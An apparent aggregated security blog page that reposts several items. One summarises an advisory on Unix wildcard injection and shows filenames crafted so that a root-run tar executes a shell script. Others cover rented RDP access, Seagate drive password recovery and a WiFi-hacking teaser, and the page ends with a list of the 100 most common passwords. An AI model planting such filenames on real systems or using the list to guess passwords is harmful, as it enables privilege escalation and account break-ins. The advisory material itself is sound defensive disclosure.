Exploiting Wildcards On Linux/Unix

Standard

From: http://beta.slashdot.org/story/203895


DefenseCode released an advisory in which researcher Leon Juranic details security issues related to using wildcards in Unix commands. The topic has been talked about in the past on the Full Disclosure mailing list, where some people saw this more as a feature than as a bug.

There are clearly a number of potential security issues surrounding this, so Mr. Juranic provided five actual exploitation examples that stress out the risks accompanying practice of using the * wildcard with Linux/Unix commands.

The issue can be manifested by using specific options in chown, tar, rsync etc. By using specially crafted filenames, an attacker can inject arbitrary arguments to shell commands run by other users – root as well.

One of the examples provided is the tar arbitrary command execution. The binary has two options that can be used for poisoning:

–checkpoint[=NUMBER]
display progress messages every NUMBERth record (default 10)

–checkpoint-action=ACTION
execute ACTION on each checkpoint

By using tar with these options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.

Running tar cf archive.tar * on a folder with these files seems pretty straightforward and benign.

[root@defensecode public]# ls -al
drwxrwxrwx. 2 user user 4096 Oct 28 19:34 .
drwx——. 24 user user 4096 Oct 28 18:32 ..
-rw-rw-r–. 1 user user 20480 Oct 28 19:13 admin.php
-rw-rw-r–. 1 user user 34 Oct 28 17:47 ado.php
-rw-rw-r–. 1 user user 187 Oct 28 17:44 db.php
-rw-rw-r–. 1 user user 201 Oct 28 17:43 download.php

The problem arises if the user created a couple of fake files and a shell script that contains any arbitrary command.

[root@defensecode public]# ls -al
drwxrwxrwx. 2 user user 4096 Oct 28 19:34 .
drwx——. 24 user user 4096 Oct 28 18:32 ..
-rw-rw-r–. 1 user user 20480 Oct 28 19:13 admin.php
-rw-rw-r–. 1 user user 34 Oct 28 17:47 ado.php
-rw-r–r–. 1 leon leon 0 Oct 28 19:19 –checkpoint=1
-rw-r–r–. 1 leon leon 0 Oct 28 19:17 –checkpoint-action=exec=sh shell.sh
-rw-rw-r–. 1 user user 187 Oct 28 17:44 db.php
-rw-rw-r–. 1 user user 201 Oct 28 17:43 download.php
-rwxr-xr-x. 1 leon leon 12 Oct 28 19:17 shell.sh

By using the * wildcard in the tar command, these files will be understood as passed options to the tar binary and shell.sh will be executed as root.

The advisory in question details other similar exploitation methods. Also, around the same time when Mr. Juranic informed us about his work, another researcher posted to the Full Disclosure mailing list a similarly themed research focused on exploiting wildcards.

Is there a workaround? To quote the most upvoted post on a recent Reddit thread regarding wildcard exploitation: “./* Done”.

623 total views, 1 views today

Hacked Via RDP: Really Dumb Passwords

Standard

From: http://krebsonsecurity.com/2013/12/hacked-via-rdp-really-dumb-passwords/

Businesses spend billions of dollars annually on software and hardware to block external cyberattacks, but a shocking number of these same organizations shoot themselves in the foot by poking gaping holes in their digital defenses and then advertising those vulnerabilities to attackers. Today’s post examines an underground service that rents access to hacked PCs at organizations that make this all-too-common mistake.
Continue reading

758 total views, 3 views today

Bypassing Seagate ATA Security Lock

Standard

From: http://feedproxy.google.com/~r/hackaday/LgoM/~3/2sk-aqNfkZ0/


Bypassing Seagate ATA Security Lock

November 29, 2013 by  15 Comments

seagate

Here’s a common story when it comes to password retrieval: guy sets up a PC, and being very security-conscious, puts a password on his Seagate hard drive. Fast forward a few months, and the password is, of course, forgotten. Hard drive gets shuffled around between a few ‘computer experts’ in an attempt to solve the problem, and eventually winds up on [blacklotus89]‘s workbench. Here’s how he solved this problem.

What followed is a walk down Hackaday posts from years ago. [blacklotus] originally foundone of our posts regarding the ATA password lock on a hard drive. After downloading the required tool, he found it only worked on WD hard drives, and not the Seagate sitting lifeless on his desk. Another Hackaday post proved to be more promising. By accessing the hard drive controller’s serial port, [blacklotus] was able to see the first few lines of the memory and the buffer.

Two hours and two Python scripts later, [blacklotus] was able to dump the contents of his drive. He then took another Seagate drive, locked it, dumped it, and analyzed the data coming from this new locked drive. He found his old password and used the same method to look for the password on the old, previously impenetrable drive. It turns out the password for the old drive was set to ’0000′, an apparently highly secure password.

In going through a few forums, [blacklotus] found a lot of people asking for help with the same problem, and a lot of replies saying. ‘we don’t know if this hard drive is yours so we can’t help you.’ It appears those code junkies didn’t know how to unlock a hard drive ether, so [blacklotus] put all his tools up on GitHub. Great work, and something that didn’t end up as a Hackaday Fail of the Week as [blacklotus] originally expected.

597 total views, 1 views today

How to Hack Wifi (and how to avoid being hacked): WEP/WPA/WPA2 | CodeBangers

Standard

From: http://codebangers.com/?p=249

 

This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 Network and then I will give tips on how to avoid getting hacked.

This is important information in our techno-savy culture. If your wireless network is compromised you can be liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other peoples wireless networks.

NOTE: Hacking your neighbors or anyone else’s Wifi without their permission is ILLEGAL. Be smart!
Continue reading

660 total views, 1 views today

HackTalk’s Top 100 Passwords of 2012 | HackTalk

Standard

http://blog.hacktalk.net/hacktalks-top-100-passwords-of-2012/

Here’s my list of Top 100 Passwords of 2012. Note that there are only 99 since the most common password with 24424 hits was blank…

These passwords are ordered from most frequent to least.

123456
111111
123456789
password
123
12345678
000000
123123
welcome
12345
654321
ninja
abc123
1234
1234567
1
123321
qwerty
666666
iloveyou
sunshine
princess
abcd1234
5201314
888888
monkey
michael
aaaaaa
112358
freedom
123456jcow
record_created
password1
writer
record_modified
baseball
0
jcow
shadow
881022
tigger
dragon
computer
alonelypuma
success
jordan
123654
football
whatever
superman
michelle
08416263aaaaaa
159753
06092684
purple
ashley
112233
ginger
1234567890
maggie
daniel
love
justin
jasmine
rainbow
1q2w3e4r
samantha
pepper
121212
jennifer
charlie
333333
family
cookie
acm
babygirl
1a1a1a1b
115599
thomas
joshua
associated
5025578
31415926
william
the
nicole
buster
blessed
314159
money
lovely
destiny
butterfly
brandon
anthony
angels
1qaz2wsx
hunter
crystal

504 total views, 1 views today